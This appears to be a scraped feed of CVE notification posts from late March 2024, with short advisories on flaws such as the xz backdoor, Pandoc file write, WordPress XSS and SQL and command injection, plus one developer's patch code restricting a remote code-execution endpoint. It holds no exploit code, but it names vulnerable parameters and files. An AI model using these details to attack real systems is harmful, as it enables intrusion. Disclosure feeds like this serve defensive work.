🚨 CVE-2023-35936Pandoc is a Haskell library for converting from one markup format to another, and a command-line tool that uses this library. Starting in version 1.13 and prior to version 3.1.4, Pandoc is susceptible to an arbitrary file write vulnerability, which can be triggered by providing a specially crafted image element in the input when generating files using the `--extract-media` option or outputting to PDF format. This vulnerability allows an attacker to create or overwrite arbitrary files on the system ,depending on the privileges of the process running pandoc. It only affects systems that pass untrusted user input to pandoc and allow pandoc to be used to produce a PDF or with the `--extract-media` option.The fix is to unescape the percent-encoding prior to checking that the resource is not above the working directory, and prior to extracting the extension. Some code for checking that the path is below the working directory was flawed in a similar way and has also been fixed. Note that the `--sandbox` option, which only affects IO done by readers and writers themselves, does not block this vulnerability. The vulnerability is patched in pandoc 3.1.4. As a workaround, audit the pandoc command and disallow PDF output and the `--extract-media` option.🎖@cveNotify |
|
| 2024-03-31 02:37:25 |
🚨 CVE-2023-41724A command injection vulnerability in Ivanti Sentry prior to 9.19.0 allows unauthenticated threat actor to execute arbitrary commands on the underlying operating system of the appliance within the same physical or logical network.🎖@cveNotify |
|
| 2024-03-31 02:37:24 |
🚨 CVE-2024-28180Package jose aims to provide an implementation of the Javascript Object Signing and Encryption set of standards. An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). This vulnerability has been patched in versions 4.0.1, 3.0.3 and 2.6.3.🎖@cveNotify |
|
| 2024-03-31 01:37:24 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-03-30 20:37:24 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-03-30 18:37:24 |
🚨 CVE-2024-1522I have activated the CORS because I had a development ui that uses another port number then I forgot to remove it.So what I just did is :- First removed the cors configuration that allows everyone to access it :before:```python sio = socketio.AsyncServer(async_mode="asgi", cors_allowed_origins="*", ping_timeout=1200, ping_interval=30) # Enable CORS for every one```after:```python cert_file_path = lollms_paths.personal_certificates/"cert.pem" key_file_path = lollms_paths.personal_certificates/"key.pem" if os.path.exists(cert_file_path) and os.path.exists(key_file_path): is_https = True else: is_https = False # Create a Socket.IO server sio = socketio.AsyncServer(async_mode="asgi", cors_allowed_origins=config.allowed_origins+[f"https://localhost:{config['port']}" if is_https else f"http://localhost:{config['port']}"], ping_timeout=1200, ping_interval=30) # Enable CORS for selected origins```- Second, I have updated lollms to have two modes (a headless mode and a ui mode).And updated the /execute_code to block if the server is headless or is exposed```python@router.post("/execute_code")async def execute_code(request: Request): """ Executes Python code and returns the output. :param request: The HTTP request object. :return: A JSON response with the status of the operation. """ if lollmsElfServer.config.headless_server_mode: return {"status":False,"error":"Code execution is blocked when in headless mode for obvious security reasons!"} if lollmsElfServer.config.host=="0.0.0.0": return {"status":False,"error":"Code execution is blocked when the server is exposed outside for very obvipous reasons!"} try: data = (await request.json()) code = data["code"] discussion_id = int(data.get("discussion_id","unknown_discussion")) message_id = int(data.get("message_id","unknown_message")) language = data.get("language","python") if language=="python": ASCIIColors.info("Executing python code:") ASCIIColors.yellow(code) return execute_python(code, discussion_id, message_id) if language=="javascript": ASCIIColors.info("Executing javascript code:") ASCIIColors.yellow(code) return execute_javascript(code, discussion_id, message_id) if language in ["html","html5","svg"]: ASCIIColors.info("Executing javascript code:") ASCIIColors.yellow(code) return execute_html(code, discussion_id, message_id) elif language=="latex": ASCIIColors.info("Executing latex code:") ASCIIColors.yellow(code) return execute_latex(code, discussion_id, message_id) elif language in ["bash","shell","cmd","powershell"]: ASCIIColors.info("Executing shell code:") ASCIIColors.yellow(code) return execute_bash(code, discussion_id, message_id) elif language in ["mermaid"]: ASCIIColors.info("Executing mermaid code:") ASCIIColors.yellow(code) return execute_mermaid(code, discussion_id, message_id) elif language in ["graphviz","dot"]: ASCIIColors.info("Executing graphviz code:") ASCIIColors.yellow(code) return execute_graphviz(code, discussion_id, message_id) return {"status": False, "error": "Unsupported language", "execution_time": 0} except Exception as ex: trace_exception(ex) lollmsElfServer.error(ex) return {"status":False,"error":str(ex)}```I also added an optional https mode and looking forward to add a full authentication with cookies and a personal session etc.All updates will be in V 9.1 Again, thanks alot for your work. I will make it harder next time, but if you find more bugs, just be my guest :)🎖@cveNotify |
|
| 2024-03-30 14:37:24 |
🚨 CVE-2024-3091A vulnerability was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/search.php of the component Search Request Page. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258684.🎖@cveNotify |
|
| 2024-03-30 13:37:24 |
🚨 CVE-2024-3090A vulnerability was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/add-ambulance.php of the component Add Ambulance Page. The manipulation of the argument Ambulance Reg No/Driver Name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258683.🎖@cveNotify |
|
| 2024-03-30 12:37:24 |
🚨 CVE-2024-3018The Essential Addons for Elementor plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.9.13 via deserialization of untrusted input from the 'error_resetpassword' attribute of the "Login | Register Form" widget (disabled by default). This makes it possible for authenticated attackers, with author-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-03-30 11:37:25 |
🚨 CVE-2024-3088A vulnerability, which was classified as critical, was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. This affects an unknown part of the file /admin/forgot-password.php of the component Forgot Password Page. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258681 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-30 11:37:24 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-03-30 10:37:24 |
🚨 CVE-2024-2491The PowerPack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the *_html_tag* attribute of multiple widgets in all versions up to, and including, 2.7.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-30 09:37:25 |
🚨 CVE-2024-3086A vulnerability classified as problematic was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected by this vulnerability is an unknown functionality of the file ambulance-tracking.php of the component Ambulance Tracking Page. The manipulation of the argument searchdata leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258679.🎖@cveNotify |
|
| 2024-03-30 09:37:24 |
🚨 CVE-2024-3085A vulnerability classified as critical has been found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login Page. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258678 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-30 08:37:24 |
🚨 CVE-2024-2948The Favorites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'user_favorites' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes such as 'no_favorites'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-30 07:37:25 |
🚨 CVE-2024-2142The Ultimate Addons for Beaver Builder – Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Info Table widget in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-30 07:37:24 |
🚨 CVE-2024-2140The Ultimate Addons for Beaver Builder – Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Icons widget in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-30 05:37:30 |
🚨 CVE-2024-2086The Integrate Google Drive – Browse, Upload, Download, Embed, Play, Share, Gallery, and Manage Your Google Drive Files Into Your WordPress Site plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to a missing capability check on multiple AJAX in all versions up to, and including, 1.3.8. This makes it possible for authenticated attackers to modify plugin settings as well as allowing full read/write/delete access to the Google Drive associated with the plugin.🎖@cveNotify |
|
| 2024-03-30 05:37:26 |
🚨 CVE-2024-1238The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button ID parameter in all versions up to, and including, 3.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-30 05:37:25 |
🚨 CVE-2024-0367The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link field of an installed widget (e.g., 'Button Link') in all versions up to, and including, 1.5.96 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-30 04:37:25 |
🚨 CVE-2024-28180Package jose aims to provide an implementation of the Javascript Object Signing and Encryption set of standards. An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). This vulnerability has been patched in versions 4.0.1, 3.0.3 and 2.6.3.🎖@cveNotify |
|
| 2024-03-30 04:37:24 |
🚨 CVE-2024-28176jose is JavaScript module for JSON Object Signing and Encryption, providing support for JSON Web Tokens (JWT), JSON Web Signature (JWS), JSON Web Encryption (JWE), JSON Web Key (JWK), JSON Web Key Set (JWKS), and more. A vulnerability has been identified in the JSON Web Encryption (JWE) decryption interfaces, specifically related to the support for decompressing plaintext after its decryption. Under certain conditions it is possible to have the user's environment consume unreasonable amount of CPU time or memory during JWE Decryption operations. This issue has been patched in versions 2.0.7 and 4.15.5.🎖@cveNotify |
|
| 2024-03-30 02:37:32 |
🚨 CVE-2024-28180Package jose aims to provide an implementation of the Javascript Object Signing and Encryption set of standards. An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). This vulnerability has been patched in versions 4.0.1, 3.0.3 and 2.6.3.🎖@cveNotify |
|
| 2024-03-30 02:37:26 |
🚨 CVE-2024-28176jose is JavaScript module for JSON Object Signing and Encryption, providing support for JSON Web Tokens (JWT), JSON Web Signature (JWS), JSON Web Encryption (JWE), JSON Web Key (JWK), JSON Web Key Set (JWKS), and more. A vulnerability has been identified in the JSON Web Encryption (JWE) decryption interfaces, specifically related to the support for decompressing plaintext after its decryption. Under certain conditions it is possible to have the user's environment consume unreasonable amount of CPU time or memory during JWE Decryption operations. This issue has been patched in versions 2.0.7 and 4.15.5.🎖@cveNotify |
|
| 2024-03-30 02:37:25 |
🚨 CVE-2023-38745Pandoc before 3.1.6 allows arbitrary file write: this can be triggered by providing a crafted image element in the input when generating files via the --extract-media option or outputting to PDF format. This allows an attacker to create or overwrite arbitrary files, depending on the privileges of the process running Pandoc. It only affects systems that pass untrusted user input to Pandoc and allow Pandoc to be used to produce a PDF or with the --extract-media option. NOTE: this issue exists because of an incomplete fix for CVE-2023-35936 (failure to properly account for double encoded path names).🎖@cveNotify |
|
| 2024-03-30 02:37:24 |
🚨 CVE-2023-35936Pandoc is a Haskell library for converting from one markup format to another, and a command-line tool that uses this library. Starting in version 1.13 and prior to version 3.1.4, Pandoc is susceptible to an arbitrary file write vulnerability, which can be triggered by providing a specially crafted image element in the input when generating files using the `--extract-media` option or outputting to PDF format. This vulnerability allows an attacker to create or overwrite arbitrary files on the system ,depending on the privileges of the process running pandoc. It only affects systems that pass untrusted user input to pandoc and allow pandoc to be used to produce a PDF or with the `--extract-media` option.The fix is to unescape the percent-encoding prior to checking that the resource is not above the working directory, and prior to extracting the extension. Some code for checking that the path is below the working directory was flawed in a similar way and has also been fixed. Note that the `--sandbox` option, which only affects IO done by readers and writers themselves, does not block this vulnerability. The vulnerability is patched in pandoc 3.1.4. As a workaround, audit the pandoc command and disallow PDF output and the `--extract-media` option.🎖@cveNotify |
|
| 2024-03-30 01:37:26 |
🚨 CVE-2024-28288Ruijie RG-NBR700GW 10.3(4b12) router lacks cookie verification when resetting the password, resulting in an administrator password reset vulnerability. An attacker can use this vulnerability to log in to the device and disrupt the business of the enterprise.🎖@cveNotify |
|
| 2024-03-29 19:37:24 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-03-29 18:37:36 |
🚨 CVE-2024-30442Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldThemes Bold Page Builder allows Stored XSS.This issue affects Bold Page Builder: from n/a through 4.8.0.🎖@cveNotify |
|
| 2024-03-29 18:37:35 |
🚨 CVE-2024-30440Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themify Themify Event Post allows Stored XSS.This issue affects Themify Event Post: from n/a through 1.2.7.🎖@cveNotify |
|
| 2024-03-29 18:37:31 |
🚨 CVE-2024-30438Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins Print Page block allows Stored XSS.This issue affects Print Page block: from n/a through 1.0.8.🎖@cveNotify |
|
| 2024-03-29 18:37:30 |
🚨 CVE-2024-30436Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Collect.Chat Inc. Collectchat allows Stored XSS.This issue affects Collectchat: from n/a through 2.4.1.🎖@cveNotify |
|
| 2024-03-29 18:37:29 |
🚨 CVE-2024-30435Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in POSIMYTH The Plus Blocks for Block Editor | Gutenberg allows Reflected XSS.This issue affects The Plus Blocks for Block Editor | Gutenberg: from n/a through 3.2.5.🎖@cveNotify |
|
| 2024-03-29 18:37:26 |
🚨 CVE-2024-30434Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP-CRM System allows Stored XSS.This issue affects WP-CRM System: from n/a through 3.2.9.🎖@cveNotify |
|
| 2024-03-29 18:37:25 |
🚨 CVE-2024-30431Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hometory Mang Board WP allows Reflected XSS.This issue affects Mang Board WP: from n/a through 1.8.0.🎖@cveNotify |
|
| 2024-03-29 18:37:24 |
🚨 CVE-2024-29667SQL Injection vulnerability in Tongtianxing Technology Co., Ltd CMSV6 v.7.31.0.2 through v.7.31.0.3 allows a remote attacker to escalate privileges and obtain sensitive information via the ids parameter.🎖@cveNotify |
|
| 2024-03-29 17:37:43 |
🚨 CVE-2024-30463Missing Authorization vulnerability in realmag777 BEAR.This issue affects BEAR: from n/a through 1.1.4.3.🎖@cveNotify |
|
| 2024-03-29 17:37:42 |
🚨 CVE-2024-30460Cross-Site Request Forgery (CSRF) vulnerability in Tumult Inc Tumult Hype Animations.This issue affects Tumult Hype Animations: from n/a through 1.9.11.🎖@cveNotify |
|
| 2024-03-29 17:37:41 |
🚨 CVE-2024-30455Cross-Site Request Forgery (CSRF) vulnerability in GamiPress.This issue affects GamiPress: from n/a through 6.8.5.🎖@cveNotify |
|
| 2024-03-29 17:37:38 |
🚨 CVE-2024-30454Cross-Site Request Forgery (CSRF) vulnerability in VeronaLabs WP SMS.This issue affects WP SMS: from n/a through 6.6.2.🎖@cveNotify |
|
| 2024-03-29 17:37:37 |
🚨 CVE-2024-30451Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in INFINITUM FORM Geo Controller allows Stored XSS.This issue affects Geo Controller: from n/a through 8.6.4.🎖@cveNotify |
|
| 2024-03-29 17:37:36 |
🚨 CVE-2024-30450Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Step-Byte-Service GmbH OpenStreetMap for Gutenberg and WPBakery Page Builder (formerly Visual Composer) allows Stored XSS.This issue affects OpenStreetMap for Gutenberg and WPBakery Page Builder (formerly Visual Composer): from n/a through 1.1.1.🎖@cveNotify |
|
| 2024-03-29 17:37:33 |
🚨 CVE-2024-30449Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Booking Activities Team Booking Activities allows Reflected XSS.This issue affects Booking Activities: from n/a through 1.15.19.🎖@cveNotify |
|
| 2024-03-29 17:37:32 |
🚨 CVE-2024-30446Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CRM Perks CRM Perks Forms allows Stored XSS.This issue affects CRM Perks Forms: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-03-29 17:37:31 |
🚨 CVE-2024-30445Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GhozyLab, Inc. Web Icons allows Stored XSS.This issue affects Web Icons: from n/a through 1.0.0.10.🎖@cveNotify |
|
| 2024-03-29 17:37:28 |
🚨 CVE-2024-30444Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zionbuilder.Io WordPress Page Builder – Zion Builder allows Stored XSS.This issue affects WordPress Page Builder – Zion Builder: from n/a through 3.6.9.🎖@cveNotify |
|
| 2024-03-29 17:37:27 |
🚨 CVE-2024-25944Dell OpenManage Enterprise, v4.0 and prior, contain(s) a path traversal vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, to gain unauthorized access to the files stored on the server filesystem, with the privileges of the running web application.🎖@cveNotify |
|
| 2024-03-29 17:37:26 |
🚨 CVE-2023-49232An authentication bypass vulnerability was found in Stilog Visual Planning 8. It allows an unauthenticated attacker to brute-force the password reset PINs of administrative users.🎖@cveNotify |
|
| 2024-03-29 16:37:43 |
🚨 CVE-2024-30521Cross-Site Request Forgery (CSRF) vulnerability in Landingi Landingi Landing Pages.This issue affects Landingi Landing Pages: from n/a through 3.1.1.🎖@cveNotify |
|
| 2024-03-29 16:37:36 |
🚨 CVE-2024-30514Insertion of Sensitive Information into Log File vulnerability in Paid Memberships Pro Paid Memberships Pro – Payfast Gateway Add On.This issue affects Paid Memberships Pro – Payfast Gateway Add On: from n/a through 1.4.1.🎖@cveNotify |
|
| 2024-03-29 16:37:35 |
🚨 CVE-2024-30492Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WebToffee Import Export WordPress Users.This issue affects Import Export WordPress Users: from n/a through 2.5.2.🎖@cveNotify |
|
| 2024-03-29 16:37:31 |
🚨 CVE-2024-30477Missing Authorization vulnerability in Klarna Klarna Payments for WooCommerce.This issue affects Klarna Payments for WooCommerce: from n/a through 3.2.4.🎖@cveNotify |
|
| 2024-03-29 16:37:30 |
🚨 CVE-2024-30247NextcloudPi is a ready to use image for Virtual Machines, Raspberry Pi, Odroid HC1, Rock64 and other boards. A command injection vulnerability in NextCloudPi allows command execution as the root user via the NextCloudPi web-panel. Due to a security misconfiguration this can be used by anyone with access to NextCloudPi web-panel, no authentication is required. It is recommended that the NextCloudPi is upgraded to 1.53.1.🎖@cveNotify |
|
| 2024-03-29 16:37:29 |
🚨 CVE-2024-30246Tuleap is an Open Source Suite to improve management of software developments and collaboration. A malicious user could exploit this issue on purpose to delete information on the instance or possibly gain access to restricted artifacts. It is however not possible to control exactly which information is deleted. Information from theDate, File, Float, Int, List, OpenList, Text, and Permissions on artifact (this one can lead to the disclosure of restricted information) fields can be impacted. This vulnerability is fixed in Tuleap Community Edition version 15.7.99.6 and Tuleap Enterprise Edition 15.7-2, 15.6-5, 15.5-6, 15.4-8, 15.3-6, 15.2-5, 15.1-9, 15.0-9, and 14.12-6.🎖@cveNotify |
|
| 2024-03-29 16:37:26 |
🚨 CVE-2024-29904CodeIgniter is a PHP full-stack web framework A vulnerability was found in the Language class that allowed DoS attacks. This vulnerability can be exploited by an attacker to consume a large amount of memory on the server. Upgrade to v4.4.7 or later.🎖@cveNotify |
|
| 2024-03-29 16:37:25 |
🚨 CVE-2024-29686Server-side Template Injection (SSTI) vulnerability in Winter CMS v.1.2.3 allows a remote attacker to execute arbitrary code via a crafted payload to the CMS Pages field and Plugin components.🎖@cveNotify |
|
| 2024-03-29 16:37:24 |
🚨 CVE-2023-49231An authentication bypass vulnerability was found in Stilog Visual Planning 8. It allows an unauthenticated attacker to receive an administrative API token.🎖@cveNotify |
|
| 2024-03-29 14:37:32 |
🚨 CVE-2024-30426Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HashThemes Hash Elements allows Stored XSS.This issue affects Hash Elements: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-03-29 14:37:26 |
🚨 CVE-2024-30425Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Beaver Builder Team Beaver Builder allows Stored XSS.This issue affects Beaver Builder: from n/a through 2.7.4.4.🎖@cveNotify |
|
| 2024-03-29 14:37:25 |
🚨 CVE-2023-6047Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Algoritim E-commerce Software allows Reflected XSS.This issue affects E-commerce Software: before 3.9.2.🎖@cveNotify |
|
| 2024-03-29 14:37:24 |
🚨 CVE-2023-6437Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in TP-Link TP-Link EX20v AX1800, Tp-Link Archer C5v AC1200, Tp-Link TD-W9970, Tp-Link TD-W9970v3, TP-Link VX220-G2u, TP-Link VN020-G2u allows authenticated OS Command Injection.This issue affects TP-Link EX20v AX1800, Tp-Link Archer C5v AC1200, Tp-Link TD-W9970, Tp-Link TD-W9970v3 : through 20240328. Also the vulnerability continues in the TP-Link VX220-G2u and TP-Link VN020-G2u models due to the products not being produced and supported.🎖@cveNotify |
|
| 2024-03-29 13:37:43 |
🚨 CVE-2024-30613Tenda AC15 v15.03.05.18 has a stack overflow vulnerability in the time parameter from the setSmartPowerManagement function.🎖@cveNotify |
|
| 2024-03-29 13:37:36 |
🚨 CVE-2024-30520Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Labib Ahmed Carousel Anything For WPBakery Page Builder allows Stored XSS.This issue affects Carousel Anything For WPBakery Page Builder: from n/a through 2.1.🎖@cveNotify |
|
| 2024-03-29 13:37:35 |
🚨 CVE-2024-30483Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Simple Sponsorships Sponsors allows Stored XSS.This issue affects Sponsors: from n/a through 3.5.1.🎖@cveNotify |
|
| 2024-03-29 13:37:34 |
🚨 CVE-2024-30458Cross-Site Request Forgery (CSRF) vulnerability in realmag777 WOOCS – WooCommerce Currency Switcher.This issue affects WOOCS – WooCommerce Currency Switcher: from n/a through 1.4.1.7.🎖@cveNotify |
|
| 2024-03-29 13:37:31 |
🚨 CVE-2024-30456Cross-Site Request Forgery (CSRF) vulnerability in realmag777 WPCS.This issue affects WPCS: from n/a through 1.2.0.1.🎖@cveNotify |
|
| 2024-03-29 13:37:30 |
🚨 CVE-2024-24784The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.🎖@cveNotify |
|
| 2024-03-29 13:37:29 |
🚨 CVE-2024-24783Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.🎖@cveNotify |
|
| 2024-03-29 13:37:26 |
🚨 CVE-2023-45290When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion. With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines.🎖@cveNotify |
|
| 2024-03-29 13:37:25 |
🚨 CVE-2024-21896The permission model protects itself against path traversal attacks by calling path.resolve() on any paths given by the user. If the path is to be treated as a Buffer, the implementation uses Buffer.from() to obtain a Buffer from the result of path.resolve(). By monkey-patching Buffer internals, namely, Buffer.prototype.utf8Write, the application can modify the result of path.resolve(), which leads to a path traversal vulnerability.This vulnerability affects all users using the experimental permission model in Node.js 20 and Node.js 21.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-03-29 13:37:24 |
🚨 CVE-2022-41946pgjdbc is an open source postgresql JDBC Driver. In affected versions a prepared statement using either `PreparedStatement.setText(int, InputStream)` or `PreparedStatemet.setBytea(int, InputStream)` will create a temporary file if the InputStream is larger than 2k. This will create a temporary file which is readable by other users on Unix like systems, but not MacOS. On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. Java 1.7 and higher users: this vulnerability is fixed in 4.5.0. Java 1.6 and lower users: no patch is available. If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will mitigate this vulnerability.🎖@cveNotify |
|
| 2024-03-29 13:07:33 |
🚨 CVE-2024-24407SQL Injection vulnerability in Best Courier management system v.1.0 allows a remote attacker to obtain sensitive information via print_pdets.php component.🎖@cveNotify |
|
| 2024-03-29 13:07:26 |
🚨 CVE-2023-50969Thales Imperva SecureSphere WAF 14.7.0.40 allows remote attackers to bypass WAF rules via a crafted POST request, a different vulnerability than CVE-2021-45468.🎖@cveNotify |
|
| 2024-03-29 13:07:25 |
🚨 CVE-2023-25341A Directory Traversal vulnerability in ladle dev server 2.5.1 and earlier allows an attacker on the same network to read files accessible to the user via GET requests.🎖@cveNotify |
|
| 2024-03-29 13:07:24 |
🚨 CVE-2024-23727The YI Smart Kami Vision com.kamivision.yismart application through 1.0.0_20231219 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component.🎖@cveNotify |
|
| 2024-03-29 12:37:25 |
🚨 CVE-2023-6191Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Egehan Security WebPDKS allows SQL Injection.This issue affects WebPDKS: through 20240329. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-29 12:37:24 |
🚨 CVE-2023-6047Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Algoritim E-commerce Software allows Reflected XSS.This issue affects E-commerce Software: through 20240329. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-29 11:37:24 |
🚨 CVE-2024-2848The Responsive theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_footer_text_callback function in all versions up to, and including, 5.0.2. This makes it possible for unauthenticated attackers to inject arbitrary HTML content into the site's footer.🎖@cveNotify |
|
| 2024-03-29 10:37:25 |
🚨 CVE-2023-52629In the Linux kernel, the following vulnerability has been resolved:sh: push-switch: Reorder cleanup operations to avoid use-after-free bugThe original code puts flush_work() before timer_shutdown_sync()in switch_drv_remove(). Although we use flush_work() to stopthe worker, it could be rescheduled in switch_timer(). As a result,a use-after-free bug can occur. The details are shown below: (cpu 0) | (cpu 1)switch_drv_remove() | flush_work() | ... | switch_timer // timer | schedule_work(&psw->work) timer_shutdown_sync() | ... | switch_work_handler // worker kfree(psw) // free | | psw->state = 0 // useThis patch puts timer_shutdown_sync() before flush_work() tomitigate the bugs. As a result, the worker and timer will bestopped safely before the deallocate operations.🎖@cveNotify |
|
| 2024-03-29 10:37:24 |
🚨 CVE-2022-47937Improper input validation in the Apache Sling Commons JSON bundle allows an attacker to trigger unexpected errors by supplying specially-crafted input.The org.apache.sling.commons.json bundle has been deprecated as of March 2017 and should not be used anymore. Consumers are encouraged to consider the Apache Sling Commons Johnzon OSGi bundle provided by the Apache Sling project, but may of course use other JSON libraries.🎖@cveNotify |
|
| 2024-03-29 09:37:25 |
